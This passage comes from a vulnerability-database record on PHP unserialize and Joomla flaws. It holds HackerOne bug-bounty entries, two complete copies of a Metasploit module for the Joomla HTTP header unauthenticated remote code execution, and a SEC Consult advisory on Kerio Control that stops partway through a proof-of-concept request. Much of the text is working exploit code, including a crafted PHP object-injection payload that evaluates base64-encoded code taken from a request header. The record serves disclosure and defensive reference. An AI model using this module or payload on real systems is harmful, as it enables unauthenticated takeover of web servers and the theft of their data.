"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-07-31T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in unserialize()", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-01T00:00:00", "id": "H1:103997", "href": "https://hackerone.com/reports/103997", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bounty": 1000.0, "description": "https://bugs.php.net/bug.php?id=70366", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-27T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in unserialize() with SplDoublyLinkedList", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-01T00:00:00", "id": "H1:103995", "href": "https://hackerone.com/reports/103995", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bounty": 1000.0, "description": "https://bugs.php.net/bug.php?id=70365", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-27T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in unserialize() with SplObjectStorage", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-01T00:00:00", "id": "H1:103996", "href": "https://hackerone.com/reports/103996", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T16:41:28", "bounty": 1500.0, "description": "https://bugs.php.net/bug.php?id=70388", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2015-08-29T00:00:00", "type": "hackerone", "title": "PHP (IBB): SOAP serialize_function_call() type confusion / RCE", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836"], "modified": "2015-09-02T00:00:00", "id": "H1:104010", "href": "https://hackerone.com/reports/104010", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2022-06-24T09:36:23", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n", "cvss3": {}, "published": "2015-12-15T17:03:36", "type": "metasploit", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-6835"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-MULTI-HTTP-JOOMLA_HTTP_HEADER_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\n 'Description' => %q{\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n },\n 'Author'\t=>\n [\n 'Marc-Alexandre Montpas', # discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8562'],\n ['EDB', '38977'], # PoC from Gary\n ['EDB', '39033'], # Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\"\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\n ['URL', 'https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\n 'DisclosureDate' => '2015-12-14',\n 'DefaultTarget' => 0)\n )\n\n register_options(\n [\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\n ])\n\n register_advanced_options(\n [\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\n ])\n end\n\n def check\n res = send_request_cgi({'uri' => target_uri.path })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n unless res.headers['X-Powered-By']\n vprint_error(\"Unable to determine the PHP version.\")\n return Exploit::CheckCode::Unknown\n end\n\n online = joomla_and_online?\n unless online\n vprint_error(\"Unable to detect joomla on #{target_uri.path}\")\n return Exploit::CheckCode::Safe\n end\n\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\n version = Rex::Version.new(php_version)\n vulnerable = false\n\n # check for ubuntu and debian specific versions. Was fixed in\n # * 5.5.9+dfsg-1ubuntu4.13\n # * 5.3.10-1ubuntu3.20\n # * 5.4.45-0+deb7u1\n # Changelogs (search for CVE-2015-6835 or #70219):\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\n if rest && rest.include?('ubuntu')\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Rex::Version.new('5.5.9')\n vulnerable = false\n elsif version == Rex::Version.new('5.5.9') && Rex::Version.new(sub_version) >= Rex::Version.new('4.13')\n vulnerable = false\n elsif version == Rex::Version.new('5.3.10') && Rex::Version.new(sub_version) >= Rex::Version.new('3.20')\n vulnerable = false\n else\n vulnerable = true\n end\n elsif rest && rest.include?('+deb')\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Rex::Version.new('5.4.45')\n vulnerable = false\n elsif version == Rex::Version.new('5.4.45') && sub_version != '7u1'\n vulnerable = false\n else\n vulnerable = true\n end\n else\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\n vulnerable = true if version <= Rex::Version.new('5.4.44')\n vulnerable = true if version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.28'))\n vulnerable = true if version.between?(Rex::Version.new('5.6.0'), Rex::Version.new('5.6.12'))\n end\n\n unless vulnerable\n vprint_error('This module currently does not work against this PHP version')\n return Exploit::CheckCode::Safe\n end\n\n j_version = joomla_version\n unless j_version.nil?\n vprint_status(\"Detected Joomla version #{j_version}\")\n return Exploit::CheckCode::Appears if Rex::Version.new(j_version) < Rex::Version.new('3.4.6')\n end\n\n return Exploit::CheckCode::Detected if online\n\n Exploit::CheckCode::Safe\n end\n\n def get_payload(header_name)\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}\"\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def exploit\n if check == Exploit::CheckCode::Safe && !datastore['FORCE']\n print_error('Target seems safe, so we will not continue.')\n return\n end\n\n print_status(\"Sending payload ...\")\n header_name = Rex::Text.rand_text_alpha_upper(5)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\n })\n fail_with(Failure::Unknown, 'No response') if res.nil?\n session_cookie = res.get_cookies\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'cookie' => session_cookie,\n 'headers' => {\n header_name => Rex::Text.encode_base64(payload.encoded)\n }\n })\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/joomla_http_header_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:02", "description": "", "cvss3": {}, "published": "2015-12-17T00:00:00", "type": "packetstorm", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-8562", "CVE-2015-6835"], "modified": "2015-12-17T00:00:00", "id": "PACKETSTORM:134949", "href": "https://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution', \n'Description' => %q{ \nJoomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. \nBy storing user supplied headers in the databases session table it's possible to truncate the input \nby sending an UTF-8 character. The custom created payload is then executed once the session is read \nfrom the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. \nIn later versions the deserialisation of invalid session data stops on the first error and the \nexploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and \n5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1. \n}, \n'Author' => \n[ \n'Marc-Alexandre Montpas', # discovery \n'Christian Mehlmauer' # metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-8562'], \n['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'], \n['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'], \n['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'], \n['URL', 'https://bugs.php.net/bug.php?id=70219'] \n], \n'Privileged' => false, \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]], \n'DisclosureDate' => 'Dec 14 2015', \n'DefaultTarget' => 0) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]), \nOptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({'uri' => target_uri.path }) \n \nunless res \nvprint_error(\"Connection timed out\") \nreturn Exploit::CheckCode::Unknown \nend \n \nunless res.headers['X-Powered-By'] \nvprint_error(\"Unable to determine the PHP version.\") \nreturn Exploit::CheckCode::Unknown \nend \n \nphp_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || '' \nversion = Gem::Version.new(php_version) \nvulnerable = false \n \n# check for ubuntu and debian specific versions. Was fixed in \n# * 5.5.9+dfsg-1ubuntu4.13 \n# * 5.3.10-1ubuntu3.20 \n# * 5.4.45-0+deb7u1 \n# Changelogs (search for CVE-2015-6835 or #70219): \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog \n# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog \nif rest && rest.include?('ubuntu') \nsub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || '' \nvprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.5.9') \nvulnerable = false \nelsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13') \nvulnerable = false \nelsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20') \nvulnerable = false \nelse \nvulnerable = true \nend \nelsif rest && rest.include?('+deb') \nsub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || '' \nvprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.4.45') \nvulnerable = false \nelsif version == Gem::Version.new('5.4.45') && sub_version != '7u1' \nvulnerable = false \nelse \nvulnerable = true \nend \nelse \nvprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\") \nvulnerable = true if version <= Gem::Version.new('5.4.44') \nvulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28')) \nvulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12')) \nend \n \nunless vulnerable \nvprint_error('This module currently does not work against this PHP version') \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') }) \nif res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>') \njoomla_version = res.body.scan(/<version>([\\d\\.]+)<\\/version>/i).flatten.first || '' \nunless joomla_version.empty? \nvprint_status(\"Detected Joomla version #{joomla_version}\") \nreturn Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6') \nend \nend \n \nres.get_html_meta_elements.each do |element| \nif element.attributes['name'] && \n/^generator$/i === element.attributes['name'] && \nelement.attributes['content'] && \n/joomla/i === element.attributes['content'].value \nreturn Exploit::CheckCode::Detected \nend \nend \n \nExploit::CheckCode::Safe \nend \n \n# gets a random 4 byte UTF-8 character \ndef get_terminator \n# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF \n[rand(0x10000..0x10ffff)].pack('U*') \nend \n \ndef get_payload(header_name) \npre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\" \npre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";' \npay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\" \npost_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}' \nt1000 = get_terminator \nreturn \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{t1000}\" \nend \n \ndef print_status(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef print_error(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef exploit \nif check == Exploit::CheckCode::Safe && datastore['FORCE'] == false \nprint_error('Target seems safe, so we will not continue.') \nreturn \nend \n \nprint_status(\"Sending payload ...\") \nheader_name = Rex::Text.rand_text_alpha_upper(5) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => target_uri.path, \n'headers' => { datastore['HEADER'] => get_payload(header_name) } \n}) \nfail_with(Failure::Unknown, 'No response') if res.nil? \nsession_cookie = res.get_cookies \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => target_uri.path, \n'cookie' => session_cookie, \n'headers' => { \nheader_name => Rex::Text.encode_base64(payload.encoded) \n} \n}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134949/joomla_http_header_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:29", "description": "", "cvss3": {}, "published": "2016-09-22T00:00:00", "type": "packetstorm", "title": "Kerio Control Unified Threat Management Code Execution / XSS / Memory Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-5771", "CVE-2015-6834", "CVE-2014-3515", "CVE-2014-8142", "CVE-2016-5773", "CVE-2015-0231"], "modified": "2016-09-22T00:00:00", "id": "PACKETSTORM:138812", "href": "https://packetstormsecurity.com/files/138812/Kerio-Control-Unified-Threat-Management-Code-Execution-XSS-Memory-Corruption.html", "sourceData": "`SEC Consult has also released a blog post describing the attack scenarios \nof the vulnerabilities within this advisory in detail and a video which \nshows the remote attack. Exploit code has been developed as well but will \nnot be released for now. \n \nBlog: \nhttp://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html \n \nVideo: \nhttps://www.youtube.com/watch?v=y_OWz25sHMI \n \n \nSEC Consult Vulnerability Lab Security Advisory < 20160922-0 > \n======================================================================= \ntitle: Potential backdoor access through multiple vulnerabilities \nproduct: Kerio Control Unified Threat Management \nvulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1 \nbuild 1324 \nfixed version: 9.1.3 (partially fixed, see vendor statement below) \nCVE number: - \nimpact: critical \nhomepage: http://www.kerio.com/ \nfound: 2016-08-24 \nby: R. Freingruber (Office Vienna) \nR. Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nBangkok - Berlin - Linz - Montreal - Moscow \nSingapore - Vienna (HQ) - Vilnius - Zurich \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Protect your network from viruses, malware and malicious activity \nwith Kerio Control, the easy-to-administer yet powerful all-in-one \nsecurity solution. \nKerio Control brings together next-generation firewall capabilities - \nincluding a network firewall and router, intrusion detection and \nprevention (IPS), gateway anti-virus, VPN, and web contentand \napplication filtering. These comprehensive capabilities and unmatched \ndeployment flexibility make Kerio Control the ideal choice for small \nand mid-sized businesses.\" \n \nSource: http://www.kerio.com/products/kerio-control \n \n \nBusiness recommendation: \n------------------------ \nBy combining the vulnerabilities documented in this advisory an attacker \ncan fully compromise a network which uses the Kerio Control appliance for \nprotection. \n \nThe attacker can trick a victim to visit a malicious website which then conducts \nthe internal attack. The attacked victim must be logged in or weak credentials \nmust be configured which can be found with a bruteforce attack. \n \nThe attacker will gain a reverse root shell from the Internet to the internal \nKerio Control firewall system. Moreover, it's possible that an internal attacker \nuses the described vulnerabilities to escalate his privileges (low privileged \naccount to full root shell) to steal credentials from other users on the UTM \nappliance. \n \nMost vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found \nin just two PHP scripts. Both scripts are not referenced by any other \nPHP script nor by any binary on the system. \nBoth scripts contain a different(!), seemingly deliberate(?) CSRF bypass \nwhich make the vulnerabilities exploitable from the Internet to obtain a \nreverse root shell. \n \nSEC Consult recommends not to use Kerio Control until a thorough security \nreview has been performed by security professionals and all identified \nissues have been resolved. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nAn authenticated user (standard user or administrator) can control data, which \ngets later unserialized. Kerio Control uses PHP 5.2.13 which was released on \n2010-02-25. This version is more than 6 years old and several bugs were found \nin the meantime within the unserialize function. The following CVE numbers \nare just some examples for vulnerabilities in unserialize which lead to remote \ncode execution: \n-) CVE-2014-8142 \n-) CVE-2014-3515 \n-) CVE-2015-0231 \n-) CVE-2015-6834 \n-) CVE-2016-5771 \n-) CVE-2016-5773 \n \nPHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a \ntype confusion attack to trigger a use-after-free vulnerability. It can be used \nto read data and get full code execution. In the case of Kerio Control the \nresult of unserialize is not reflected back to the attacker. It's therefore not \npossible to read memory from the stack or heap (e.g. to bypass ASLR). \n \nNevertheless, SEC Consult developed a fully working and reliable (blind) exploit \nfor this vulnerability which spawns a reverse root shell to the Kerio Control \nsystem. \nFor this exploit a user account is required. However, it's also possible to \nconduct the attack via the Internet because the CSRF (Cross Site Request \nForgery) check can be bypassed (see below). \n \nAn attacker can use this vulnerability to break into a company network via the \nInternet by tricking a logged in user to visit a malicious website. Even if the \nuser is currently not logged in the attacker can start a bruteforce attack to \nobtain valid credentials to conduct the attack. \n \n \n2) PHP script allows heap spraying \nOne of the PHP scripts allows the allocation of memory inside the main binary \n(winroute) of Kerio Control. Winroute contains the code of most services \n(e.g. the webserver, PHP, network related functionality, ...). \nThe memory will not be freed after finishing the request and can therefore be \nused to spray payloads to the whole memory space. \n \nThis vulnerability was used in the overall exploit to defeat ASLR. \nPlease bear in mind that it's very likely that an attacker can write a working \nexploit without heap spraying. Fixing this vulnerability would therefore not \nprevent the exploitation of the remote code execution vulnerability. \nFor example, the information disclosure vulnerability from this advisory can \nbe used to bypass ASLR as well. This would eliminate the need of heap spraying. \n \n \n3) CSRF Protection Bypass \nThe PHP scripts contain code to protect against CSRF (Cross Site Request \nForgery) attacks. Because of the wrong usage of PHP binary \noperations and comparisons it's possible to bypass this check. That means \nthat an attacker can trigger requests from other websites which will be handled \nby Kerio Control. This vulnerability allows to exploit the remote code \nexecution vulnerability from the Internet to break into a network. \n \n \n4) Webserver running with root privileges \nThe main binary (which contains the webserver and PHP) runs with root \nprivileges. \n \nKerio told SEC Consult that this vulnerability will not be fixed. SEC \nConsult strongly recommended otherwise. \n \n \n5) Reflected Cross Site Scripting (XSS) \nKerio Control does not properly encode parameters which are reflected on the \nwebsite. This leads to cross site scripting vulnerabilities. \nAn attacker can abuse these vulnerabilities to modify the website or do actions \nin the context of the attacked user. \n \n \n6) Missing memory corruption protections \nThe main binary (winroute) is not compiled as position-independent executable \n(PIE). This allowed the use of ROP (return-oriented-programming) code to \nbypass the not executable heap. Moreover, the stack is per default marked as \nexecutable, but the exact location of the stack is randomized by ASLR. \n \n \n7) Information Disclosure leads to ASLR bypass \nOne of the PHP scripts leaks pointers to the stack and heap. \nThis can be abused by attackers to bypass ASLR. \nBecause stacks are marked as executable an attacker can therefore easily bypass \nASLR and DEP/NX. \n \n \n8) Remote Code Execution as administrator \nNearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code \nexecution vulnerability in the administrative web interface in the upgrade \nfunctionality. This vulnerability is still unfixed, only the associated XSS \nvulnerability was fixed. However, an attacker can still exploit it from the \nInternet, e.g. by abusing the XSS vulnerability described in this advisory \n(where the CSRF check can be bypassed). \n \nWith this vulnerability an attacker can gain a reverse root shell on \nKerio Control again if a logged in administrator visits a malicious website \non the Internet. \nMore information can also be found in the old advisory: \nhttps://www.exploit-db.com/exploits/38450/ \n \n \n9) Login not protected against brute-force attacks \nThere are no bruteforce protections in place for the login. \nIf an unauthenticated victim visits an attacker's website, the attacker can \nstart a bruteforce attack to obtain valid credentials to execute the \nremote code execution exploit. Via image-loading the attacker can detect if \nthe current credentials are valid (without violating SOP). \n \n \nProof of concept: \n----------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nThe following request can be used to set the unserialize data. In this example \na faked string is used which points to 0xffffffff (kernel memory). Unserializing \nit will therefore crash the remote webserver (the winroute process). \n \nPOST /set.php HTTP/1.1 \nHost: $IP:4081 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 730 \n 